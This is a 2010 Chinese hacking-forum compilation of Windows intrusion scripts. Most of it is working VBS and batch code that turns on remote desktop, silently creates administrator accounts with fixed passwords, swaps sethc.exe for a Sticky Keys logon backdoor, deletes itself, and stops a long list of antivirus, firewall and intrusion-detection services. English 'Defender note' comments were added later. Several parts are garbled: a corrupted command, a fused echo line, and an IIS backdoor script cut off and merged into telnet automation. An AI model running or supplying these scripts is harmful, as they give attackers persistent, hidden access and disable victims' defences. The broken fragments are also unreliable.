xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本+提权VBS 整理收集

xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本+提权VBS 整理收集
2010年12月07日
  xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本
  vbson error resume next
  ' Enables Remote Desktop (Terminal Services) on the local machine by writing
  ' registry values through the WMI StdRegProv provider rather than reg.exe or
  ' regedit.
  ' Defender note: each write below changes the host's remote-access posture.
  ' Audit the Terminal Server keys named here and alert when the writing
  ' process is a script host (wscript.exe / cscript.exe); a transition of
  ' fDenyTSConnections to 0 on a machine that is not meant to accept RDP should
  ' be investigated together with any new local accounts.
  const HKEY_LOCAL_MACHINE = &H80000002
  ' "." addresses the local computer in the WMI moniker below.
  strComputer = "."
  ' StdOut is bound here but not used in the lines shown.
  Set StdOut = WScript.StdOut
  Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
  strComputer & "\root\default:StdRegProv")
  ' Make sure the keys exist before values are written into them.
  strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
  oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
  strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
  oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
  ' This assignment is overwritten on the next line before it is used, so no
  ' CreateKey call is made for the WinStations\RDP-Tcp key.
  strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
  strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
  ' fDenyTSConnections = 0 allows incoming Terminal Services connections.
  strValueName = "fDenyTSConnections"
  dwValue = 0
  oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
  ' The listening port is written as 3389 in both places that store it.
  strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
  strValueName = "PortNumber"
  dwValue = 3389
  oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
  strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
  strValueName = "PortNumber"
  dwValue = 3389
  oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
  ' Creates a local user through the ADSI WinNT provider and adds it to the
  ' local Administrators group. Name and password are taken from the first two
  ' script arguments; when no arguments are given, the hard-coded pair in the
  ' line below is used. "on error resume next" suppresses every runtime error,
  ' so the script gives no sign of whether the account was really created.
  ' Defender note: no net.exe process is started, so detections must not rely
  ' on "net user" / "net localgroup" command lines alone. Account-management
  ' auditing still records the new user and the group change (event IDs 624
  ' and 636 on XP/2003, 4720 and 4732 on later Windows). The default account
  ' name and password are fixed strings and can be used as indicators when a
  ' copy of this script is found on disk; also review Administrators group
  ' membership for accounts nobody can account for.
  on error resume next
  dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath
  ' Sticky Keys (sethc.exe) replacement followed by deletion of the script.
  ' The command string passed to Run is corrupted in this copy of the page (the
  ' "©" characters are an extraction artifact); it is kept verbatim and is not
  ' a faithful record of the original. The readable parts take ownership of
  ' sethc.exe, grant the current user full control of it, delete it, and rename
  ' another file to sethc.exe. Run(..., 0, True) uses a hidden window and waits
  ' for the command to finish.
  ' Defender note: sethc.exe can be started from the logon screen, so a
  ' replaced binary gives access without credentials. Put file-integrity
  ' monitoring on sethc.exe (hash, signature and version metadata against a
  ' known-good copy), alert on takeown/cacls runs that name it, and require
  ' Network Level Authentication for RDP on Windows versions that support it
  ' so the logon screen is not reachable before authentication.
  On Error Resume Next
  Dim obj, success
  Set obj = CreateObject("WScript.Shell")
  success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
  ' Deletes the file named like the running script, so the script itself is
  ' unlikely to be available as evidence; process-creation logging and the
  ' changed sethc.exe are the artefacts to look for instead.
  CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)
  加用户
  --------------------------------
  rem Builds a temporary 3389.reg file line by line, imports it silently with
  rem "regedit /s", then deletes it. The values written are
  rem fDenyTSConnections = 0 and PortNumber = 0x0d3d (3389 decimal) under the
  rem two Terminal Server keys named below.
  rem NOTE(review): the second line carries two echo commands fused together in
  rem this copy of the page; it is kept exactly as found.
  rem Defender note: the .reg file exists only briefly, so look for the
  rem "regedit /s" process creation and for the resulting registry changes
  rem rather than for the file on disk.
  echo Windows Registry Editor Version 5.00>>3389.reg
  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.regecho "fDenyTSConnections"=dword:00000000>>3389.reg
  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
  echo "PortNumber"=dword:00000d3d>>3389.reg
  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
  echo "PortNumber"=dword:00000d3d>>3389.reg
  regedit /s 3389.reg
  del 3389.reg
  -------------------------------------------------
  vbs加用户精简版
  ' Starts two hidden-window (style 0) commands through WScript.Shell: one adds
  ' a local user with a fixed name and password, the other adds that user to
  ' the local Administrators group.
  ' Defender note: process-creation logging shows net.exe started by a script
  ' host (wscript.exe / cscript.exe) with "/add" on the command line; the fixed
  ' account name is a usable indicator when reviewing local accounts.
  set w=createobject("wscript.shell"):w.run "net user hack echoeye /add",0:w.run "net localgroup administrators hack /add",0
  -----------------------------------------------------
  cmd.asp webshell 上传
  ---------------------------------------------------
  
  
  
  
  
  

  

  
  
  
  
  --------------------------------------------------------------------
  Shift后门
  -----------------------------------------
  @echo off
  rem Overwrites the Sticky Keys binary (sethc.exe) with a copy of explorer.exe,
  rem repeats the overwrite for the copy under system32\dllcache, and sets the
  rem hidden attribute on both files. The echo lines are only a banner and a
  rem fake progress display. The banner states that pressing Shift five times
  rem at the terminal logon screen then gives access to the system.
  rem NOTE(review): dllcache is presumably overwritten so that Windows File
  rem Protection on XP/2003 does not restore the original - confirm.
  rem Defender note: compare sethc.exe in system32 and dllcache against a
  rem known-good hash; a sethc.exe whose version metadata or signature belongs
  rem to another binary, or that carries the hidden attribute, is a strong
  rem indicator. The author tag and URL in the banner are static strings that
  rem can be searched for in batch files recovered from a host.
  cls
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  echo.
  echo Shift后门 By:Hack残少 QQ:297248524
  echo.
  echo 使用方法:本文件执行完毕后,
  echo 在终端界面按Shift 5次即可登陆系统!
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  echo.
  rem Replace the accessibility binary, then the cached copy of it.
  copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
  echo 完成百分之 50
  copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
  echo 完成百分之 80
  rem Hide both replaced files from a default directory listing.
  attrib c:\windows\system32\sethc.exe +h
  echo 完成百分之 90
  attrib c:\windows\system32\dllcache\sethc.exe +h
  echo 完成百分之 100
  cls
  echo.
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  echo 后门安装完毕!
  echo.
  echo 感谢您使用Shift后门
  echo.
  echo By:Hack残少 QQ:297248524
  echo.
  echo http://www.shenmicaobi.com/
  echo.
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  echo.
  echo. & pause
  exit
  --------------------------------------------------------------
  不依靠CMD添加用户的VBS代码
  ' Creates a local user named "test" with a fixed password through the ADSI
  ' WinNT provider and adds it to the local Administrators group, without
  ' starting cmd.exe or net.exe.
  ' Defender note: because no command-line tool is involved, rely on
  ' account-management auditing (user created, member added to a local group)
  ' and on periodic review of Administrators membership rather than on
  ' process command lines.
  set wsnetwork=CreateObject("WSCRIPT.NETWORK")
  os="WinNT://"&wsnetwork.ComputerName
  Set ob=GetObject(os) ' bind to the computer object through ADSI
  Set oe=GetObject(os&"/Administrators,group") ' the local Administrators group
  Set od=ob.Create("user","test") ' create the user object
  od.SetPassword "1234" ' set its password
  od.SetInfo ' commit the new account
  Set of=GetObject(os&"/test",user) ' look the new user up again
  oe.add os&"/test"
  ------------------------------------------
  用vbs实现本地添加用户的脚本
  ' Opens a command prompt with "cmd /k" and types commands into it with
  ' SendKeys: three "net user ... /add" commands for the accounts admin1,
  ' admin2 and admin3 with one fixed password, then "exit". The accounts are
  ' not added to any group by the lines shown.
  ' SendKeys delivers keystrokes to whichever window has focus, so the result
  ' depends on the console window staying in the foreground.
  ' Defender note: this leaves ordinary artefacts - cmd.exe started by a
  ' script host, net.exe started from that cmd.exe, and three account-creation
  ' events in quick succession for sequentially numbered names.
  Dim WshShell
  set WshShell = CreateObject("wscript.Shell")
  WshShell.Run "cmd /k"
  for i = 1 to 3
  ' Short pause before each command is typed.
  WScript.Sleep 500
  WshShell.SendKeys "net user admin" & i & " abcd@123 /add"
  WshShell.SendKeys "{ENTER}"
  next
  WshShell.SendKeys "exit"
  WshShell.SendKeys "{ENTER}"
  ---------------------------------------------
  上帝之门 执行成功 3389 管理员帐号任意密码登入 保存为.exe
  ------------------------
  MZ
  ------------------------
  IIs后门
  -------------------
  help1="IIS后门设置器 黑猫专用版"
  help2="请输入正确的虚拟目录名称和映射的路径,格式如下"
  help3=" cscript.exe iis.vbs 虚拟目录的名称 映射的路径"
  help4="例如: cscript.exe iis.vbs lh e:\"
  set Args = Wscript.Arguments
  if args.count telnet_tmp.vbs
  echo WScript.Sleep 300 >>telnet_tmp.vbs
  echo sh.SendKeys "open 192.168.1.200" >>telnet_tmp.vbs
  echo WScript.Sleep 300 >>telnet_tmp.vbs
  echo sh.SendKeys "{ENTER}" >>telnet_tmp.vbs
  echo WScript.Sleep 300 >>telnet_tmp.vbs
  echo sh.SendKeys "engineer{ENTER}" >>telnet_tmp.vbs
  echo WScript.Sleep 300 >>telnet_tmp.vbs
  echo sh.SendKeys "ls {ENTER}">>telnet_tmp.vbs
  start telnet
  cscript //nologo telnet_tmp.vbs
  del telnet_tmp.vbs
  附录:
  对于SendKeys这个命令可以send什么,我们可以看下面的列表:
  BACKSPACE {BACKSPACE}, {BS}, or {BKSP}
  BREAK {BREAK}
  CAPS LOCK {CAPSLOCK}
  DEL or DELETE {DELETE} or {DEL}
  DOWN ARROW {DOWN}
  END {END}
  ENTER {ENTER} or ~
  ESC {ESC}
  HELP {HELP}
  HOME {HOME}
  INS or INSERT {INSERT} or {INS}
  LEFT ARROW {LEFT}
  NUM LOCK {NUMLOCK}
  PAGE DOWN {PGDN}
  PAGE UP {PGUP}
  PRINT SCREEN {PRTSC}
  RIGHT ARROW {RIGHT}
  SCROLL LOCK {SCROLLLOCK}
  TAB {TAB}
  UP ARROW {UP}
  F1 {F1}
  F2 {F2}
  F3 {F3}
  F4 {F4}
  F5 {F5}
  F6 {F6}
  F7 {F7}
  F8 {F8}
  F9 {F9}
  F10 {F10}
  F11 {F11}
  F12 {F12}
  F13 {F13}
  F14 {F14}
  F15 {F15}
  F16 {F16}
  SHIFT +
  CTRL ^
  ALT %
  二。Linux平台
  请先确认系统上已安装expect这个可执行程序,然后把以下代码保存到文件autoTelnet,并给予执行权限。详细用法请查看expect命令的手册。
  #!/usr/bin/expect --
  # Automates a telnet login: connects to $SERVER.<last octet>, answers the
  # "Password:" prompt, runs "ls" after a "#" prompt appears, then hands the
  # session to the user with "interact".
  # Security caveats: the password is stored in clear text in this file and is
  # sent over telnet, which is unencrypted, so anyone who can read the file or
  # observe the network path can recover it. Keep the file readable by its
  # owner only, and prefer SSH with key-based authentication where the target
  # supports it.
  # SERVER holds the first three octets; the last octet is appended below.
  set SERVER "192.168.1"
  # NOTE(review): USER is set but never sent in the lines shown.
  set USER "myusername"
  set PASSWD "mypass"
  # With an argument, it is used as the last octet; otherwise .200 is used.
  if { $argc } {
  spawn telnet $SERVER.$argv
  } else {
  spawn telnet $SERVER.200
  }
  expect "Password:"
  send "$PASSWD\n"
  expect "#"
  send "ls\n"
  interact
  关闭防火墙和杀毒软件的脚本
  @echo off
  rem The rest of this script issues "net stop <name> /y" for a long list of
  rem antivirus, personal-firewall and intrusion-detection product names; /y
  rem answers the confirmation prompt that net stop shows for dependent
  rem services. The list also names operating-system services such as
  rem "Protected Storage", "Smart Card", "IPSEC Services" and the Internet
  rem Connection Firewall, and one stretch of it appears twice.
  rem Defender note: a burst of net.exe / net1.exe "stop" commands aimed at
  rem security products is a high-signal indicator of defence tampering.
  rem Alert on it from process-creation logs and from Service Control Manager
  rem stop events (event ID 7036 in the System log), enable the product's
  rem tamper protection where it exists, and treat an endpoint agent that
  rem stops reporting as an incident rather than a fault.
  net stop "Ecengine.exe" /y
  net stop "eSafe Protect Desktop" /y
  net stop "Esafe.exe" /y
  net stop "Espwatch.exe" /y
  net stop "eTrust EZ Firewall" /y
  net stop "F-Agnt95.exe" /y
  net stop "Findviru.exe" /y
  net stop "Fprot.exe" /y
  net stop "F-Prot.exe" /y
  net stop "F-PROT95" /y
  net stop "F-Prot95.exe" /y
  net stop "FP-WIN" /y
  net stop "Fp-Win.exe" /y
  net stop "Freedom 2" /y
  net stop "Frw.exe" /y
  net stop "F-STOPW" /y
  net stop "F-Stopw.exe" /y
  net stop "GNAT Box Lite" /y
  net stop "IAMAPP" /y
  net stop "Iamapp.exe" /y
  net stop "Iamserv.exe" /y
  net stop "Ibmasn.exe" /y
  net stop "Ibmavsp.exe" /y
  net stop "Icload95.exe" /y
  net stop "Icloadnt.exe" /y
  net stop "ICMON" /y
  net stop "Icmon.exe" /y
  net stop "Icsupp95.exe" /y
  net stop "Icsuppnt.exe" /y
  net stop "Iface.exe" /y
  net stop "Internet Alert 99" /y
  net stop "IOMON98" /y
  net stop "Iomon98.exe" /y
  net stop "Jedi.exe" /y
  net stop "LOCKDOWN2000" /y
  net stop "Lockdown2000.exe" /y
  net stop "Look'n'Stop" /y
  net stop "Look'n'Stop Lite" /y
  net stop "Lookout.exe" /y
  net stop "LUALL" /y
  net stop "Luall.exe" /y
  net stop "LUCOMSERVER" /y
  net stop "MCAFEE" /y
  net stop "McAfee Firewall" /y
  net stop "McAfee Internet Guard Dog Pro" /y
  net stop "Moolive.exe" /y
  net stop "Mpftray.exe" /y
  net stop "N32scanw.exe" /y
  net stop "NAVAPSVC" /y
  net stop "NAVAPW32" /y
  net stop "Navapw32.exe" /y
  net stop "NAVLU32" /y
  net stop "Navlu32.exe" /y
  net stop "Navnt.exe" /y
  net stop "NAVRUNR" /y
  net stop "NAVW32" /y
  net stop "Navw32.exe" /y
  net stop "NAVWNT" /y
  net stop "Navwnt.exe" /y
  net stop "NeoWatch" /y
  net stop "NISSERV" /y
  net stop "NISUM" /y
  net stop "Nisum.exe" /y
  net stop "NMAIN" /y
  net stop "Nmain.exe" /y
  net stop "Norman Personal Firewall" /y
  net stop "Normist.exe" /y
  net stop "NORTON" /y
  net stop "Norton AntiVirus Server" /y
  net stop "Norton Internet Security" /y
  net stop "Norton Personal Firewall 2001" /y
  net stop "Nupgrade.exe" /y
  net stop "NVC95" /y
  net stop "Nvc95.exe" /y
  net stop "Outpost.exe" /y
  net stop "Padmin.exe" /y
  net stop "Pavcl.exe" /y
  net stop "Pavsched.exe" /y
  net stop "Pavw.exe" /y
  net stop "Pc firewall" /y
  net stop "PC Viper" /y
  net stop "PCCIOMON" /y
  net stop "Ecengine.exe" /y
  net stop "eSafe Protect Desktop" /y
  net stop "Esafe.exe" /y
  net stop "Espwatch.exe" /y
  net stop "eTrust EZ Firewall" /y
  net stop "F-Agnt95.exe" /y
  net stop "Findviru.exe" /y
  net stop "Fprot.exe" /y
  net stop "F-Prot.exe" /y
  net stop "F-PROT95" /y
  net stop "F-Prot95.exe" /y
  net stop "FP-WIN" /y
  net stop "Fp-Win.exe" /y
  net stop "Freedom 2" /y
  net stop "Frw.exe" /y
  net stop "F-STOPW" /y
  net stop "F-Stopw.exe" /y
  net stop "GNAT Box Lite" /y
  net stop "IAMAPP" /y
  net stop "Iamapp.exe" /y
  net stop "Iamserv.exe" /y
  net stop "Ibmasn.exe" /y
  net stop "Ibmavsp.exe" /y
  net stop "Icload95.exe" /y
  net stop "Icloadnt.exe" /y
  net stop "ICMON" /y
  net stop "Icmon.exe" /y
  net stop "Icsupp95.exe" /y
  net stop "Icsuppnt.exe" /y
  net stop "Iface.exe" /y
  net stop "Internet Alert 99" /y
  net stop "IOMON98" /y
  net stop "Iomon98.exe" /y
  net stop "Jedi.exe" /y
  net stop "LOCKDOWN2000" /y
  net stop "Lockdown2000.exe" /y
  net stop "Look'n'Stop" /y
  net stop "Look'n'Stop Lite" /y
  net stop "Lookout.exe" /y
  net stop "LUALL" /y
  net stop "Luall.exe" /y
  net stop "LUCOMSERVER" /y
  net stop "MCAFEE" /y
  net stop "McAfee Firewall" /y
  net stop "McAfee Internet Guard Dog Pro" /y
  net stop "Moolive.exe" /y
  net stop "Mpftray.exe" /y
  net stop "N32scanw.exe" /y
  net stop "NAVAPSVC" /y
  net stop "NAVAPW32" /y
  net stop "Navapw32.exe" /y
  net stop "NAVLU32" /y
  net stop "Navlu32.exe" /y
  net stop "Navnt.exe" /y
  net stop "NAVRUNR" /y
  net stop "NAVW32" /y
  net stop "Navw32.exe" /y
  net stop "NAVWNT" /y
  net stop "Navwnt.exe" /y
  net stop "NeoWatch" /y
  net stop "NISSERV" /y
  net stop "NISUM" /y
  net stop "Nisum.exe" /y
  net stop "NMAIN" /y
  net stop "Nmain.exe" /y
  net stop "Norman Personal Firewall" /y
  net stop "Normist.exe" /y
  net stop "NORTON" /y
  net stop "Norton AntiVirus Server" /y
  net stop "Norton Internet Security" /y
  net stop "Norton Personal Firewall 2001" /y
  net stop "Nupgrade.exe" /y
  net stop "NVC95" /y
  net stop "Nvc95.exe" /y
  net stop "Outpost.exe" /y
  net stop "Padmin.exe" /y
  net stop "Pavcl.exe" /y
  net stop "Pavsched.exe" /y
  net stop "Pavw.exe" /y
  net stop "Pc firewall" /y
  net stop "PC Viper" /y
  net stop "PCCIOMON" /y
  net stop "PCCMAIN" /y
  net stop "PCCWIN98" /y
  net stop "Pccwin98.exe" /y
  net stop "Pcfwallicon.exe" /y
  net stop "Persfw.exe" /y
  net stop "PGP Gauntlet" /y
  net stop "POP3TRAP" /y
  net stop "Proxy +" /y
  net stop "PVIEW95" /y
  net stop "Rav7.exe" /y
  net stop "Rav7win.exe" /y
  net stop "Rescue.exe" /y
  net stop "RESCUE32" /y
  net stop "SAFEWEB" /y
  net stop "Safeweb.exe" /y
  net stop "Scan32.exe" /y
  net stop "Scan95.exe" /y
  net stop "Scanpm.exe" /y
  net stop "Scrscan.exe" /y
  net stop "Serv95.exe" /y
  net stop "Smc.exe" /y
  net stop "SMCSERVICE" /y
  net stop "Snort - Win32 GUI" /y
  net stop "Snort (Intrusion Detection System)" /y
  net stop "Sphinx.exe" /y
  net stop "Sphinxwall" /y
  net stop "Sweep95.exe" /y
  net stop "Sybergen Secure Desktop" /y
  net stop "Sybergen SyGate" /y
  net stop "SYMPROXYSVC" /y
  net stop "Tbscan.exe" /y
  net stop "Tca.exe" /y
  net stop "Tds2-98.exe" /y
  net stop "Tds2-Nt.exe" /y
  net stop "TermiNET" /y
  net stop "TGB:BOB" /y
  net stop "Tiny Personal Firewall" /y
  net stop "Vet95.exe" /y
  net stop "Vettray.exe" /y
  net stop "Vscan40.exe" /y
  net stop "Vsecomr.exe" /y
  net stop "VSHWIN32" /y
  net stop "Vshwin32.exe" /y
  net stop "VSSTAT" /y
  net stop "Vsstat.exe" /y
  net stop "WEBSCANX" /y
  net stop "Webscanx.exe" /y
  net stop "WEBTRAP" /y
  net stop "Wfindv32.exe" /y
  net stop "Wingate" /y
  net stop "WinProxy" /y
  net stop "WinRoute" /y
  net stop "WyvernWorks Firewall" /y
  net stop "Zonealarm" /y
  net stop "Zonealarm.exe" /y
  net stop "AVP32" /y
  net stop "LOCKDOWN2000" /y
  net stop "AVP.EXE" /y
  net stop "CFINET32" /y
  net stop "CFINET" /y
  net stop "ICMON" /y
  net stop "SAFEWEB" /y
  net stop "WEBSCANX" /y
  net stop "ANTIVIR" /y
  net stop "MCAFEE" /y
  net stop "NORTON" /y
  net stop "NVC95" /y
  net stop "FP-WIN" /y
  net stop "IOMON98" /y
  net stop "PCCWIN98" /y
  net stop "F-PROT95" /y
  net stop "F-STOPW" /y
  net stop "PVIEW95" /y
  net stop "NAVWNT /y
  net stop "NAVRUNR" /y
  net stop "NAVLU32" /y
  net stop "NAVAPSVC" /y
  net stop "NISUM" /y
  net stop "SYMPROXYSVC" /y
  net stop "RESCUE32" /y
  net stop "NISSERV" /y
  net stop "ATRACK" /y
  net stop "IAMAPP" /y
  net stop "LUCOMSERVER" /y
  net stop "LUALL" /y
  net stop "NMAIN" /y
  net stop "NAVW32" /y
  net stop "NAVAPW32" /y
  net stop "VSSTAT" /y
  net stop "VSHWIN32" /y
  net stop "AVSYNMGR" /y
  net stop "AVCONSOL" /y
  net stop "WEBTRAP" /y
  net stop "POP3TRAP" /y
  net stop "PCCMAIN" /y
  net stop "PCCIOMON" /y
  net stop "Virtual CD v4 Security service (SDK - Version)" /y
  net stop "Norton Internet Security Accounts Manager" /y
  net stop "Norton AntiVirus Auto-Protect" /y
  net stop "Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)" /y
  net stop "Symantec Event Manager" /y
  net stop "Symantec Proxy Service" /y
  net stop "Symantec Settings Manager" /y
  net stop "NT LM Security Support Provider" /y
  net stop "Protected Storage" /y
  net stop "TskSrv FTP Server" /y
  net stop "Norton AntiVirus Auto Protect Service" /y
  net stop "IPSEC Policy Agent" /y
  net stop "MonSvcNT" /y
  net stop "FTP Publishing Service" /y
  net stop "IPSEC Services" /y
  net stop "Symantec AntiVirus Client" /y
  net stop "Sygate Personal Firewall" /y
  net stop "AntiVir Service" /y
  net stop "SafeNet IKE Service" /y
  net stop "SafeNet Monitor Service" /y
  net stop "Sophos Anti-Virus" /y
  net stop "Sophos Anti-Virus Network" /y
  net stop "Sophos Anti-Virus Update" /y
  net stop "Firewall della connessione Internet (ICF) / Condivisione connessione Internet (ICS)" /y
  net stop "Norton Unerase Protection" /y
  net stop "Servizio Norton AntiVirus Auto-Protect" /y
  net stop "FireDaemon Service: svchost." /y
  net stop "V3MonNT" /y
  net stop "PC-Keeper Service" /y
  net stop "Verbindingsbeheer voor RAS" /y
  net stop "Servizi IPSEC" /y
  net stop "Agente criteri IPSEC" /y
  net stop "McShield" /y
  net stop "Smart Card" /y
  net stop "F-Secure Anti-Virus Firewall Daemon" /y
  net stop "F-Secure Automatic Update" /y
  net stop "F-Secure Gatekeeper Handler Starter" /y
  net stop "F-Secure Network Request Broker" /y
  net stop "F-Secure Policy Manager Server" /y
  net stop "Symantec AntiVirus" /y
  net stop "Symantec AntiVirus Definition Watcher" /y
  exit
